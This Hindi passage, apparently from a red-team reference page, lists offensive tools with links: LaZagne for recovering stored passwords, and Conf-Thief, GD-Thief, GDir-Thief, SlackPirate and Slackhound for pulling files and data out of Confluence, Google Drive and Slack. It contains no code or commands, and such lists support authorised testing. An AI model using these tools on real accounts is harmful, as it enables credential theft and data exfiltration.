* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne प्रोजेक्ट** एक ओपन सोर्स एप्लिकेशन है जिसका उपयोग स्थानीय कंप्यूटर पर स्टोर की गई कई पासवर्ड्स को पुनः प्राप्त करने के लिए किया जाता है। प्रत्येक सॉफ्टवेयर अलग-अलग तकनीकों (सादा पाठ, एपीआई, कस्टम एल्गोरिदम्स, डेटाबेस, आदि) का उपयोग करके अपने पासवर्ड्स को स्टोर करता है। इस टूल का विकास इन पासवर्ड्स को खोजने के उद्देश्य से किया गया है जो सबसे अधिक प्रयोग किए जाने वाले सॉफ्टवेयर के लिए है।
|
||||
|
||||
## **बाह्य सेवाएं**
|
||||
|
||||
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): यह मॉड्यूल Confluence के एपीआई से कनेक्ट करेगा, पीडीएफ में निर्यात करेगा, और उन Confluence दस्तावेज़ों को डाउनलोड करेगा जिनका लक्ष्य है कि लक्ष्य को पहुंच है।
|
||||
* [**GD-Thief**](https://github.com/antman1p/GD-Thief): रेड टीम टूल एक लक्ष्य के Google Drive से फ़ाइलों को बाहर निकालने के लिए जिसका आपको पहुंच है, Google Drive एपीआई के माध्यम से। इसमें सभी साझा की गई फ़ाइलें, साझा ड्राइव से सभी फ़ाइलें, और डोमेन ड्राइव से सभी फ़ाइलें शामिल हैं जिनका लक्ष्य को पहुंच है।
|
||||
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): रेड टीम टूल जिसका उपयोग Google के लोगों के निर्देशिका को बाहर निकालने के लिए किया जाता है, जिसका आपको पहुंच है, Google के लोगों के एपीआई के माध्यम से।
|
||||
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** यह एक टूल है जो Python में विकसित किया गया है जो एक एक्सेस टोकन देता है जिसका उपयोग करके एक स्लैक वर्कस्पेस से 'दिलचस्प' जानकारी निकालने के लिए नेटिव स्लैक एपीआई का उपयोग करता है।
|
||||
* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound एक कमांड लाइन टूल है जो रेड और ब्लू टीमों को एक स्लैक वर्कस्पेस/संगठन की जांच तेजी से करने के लिए है। Slackhound एक संगठन के उपयोगकर्ताओं, फ़ाइलों, संदेशों आदि का संग्रहण तेजी से खोजने में मदद करता है और बड़े ऑब्जेक्ट्स को CSV में लिखा जाता है ऑफलाइन समीक्षा के लिए।
|
||||
|
|
Loading…
Reference in a new issue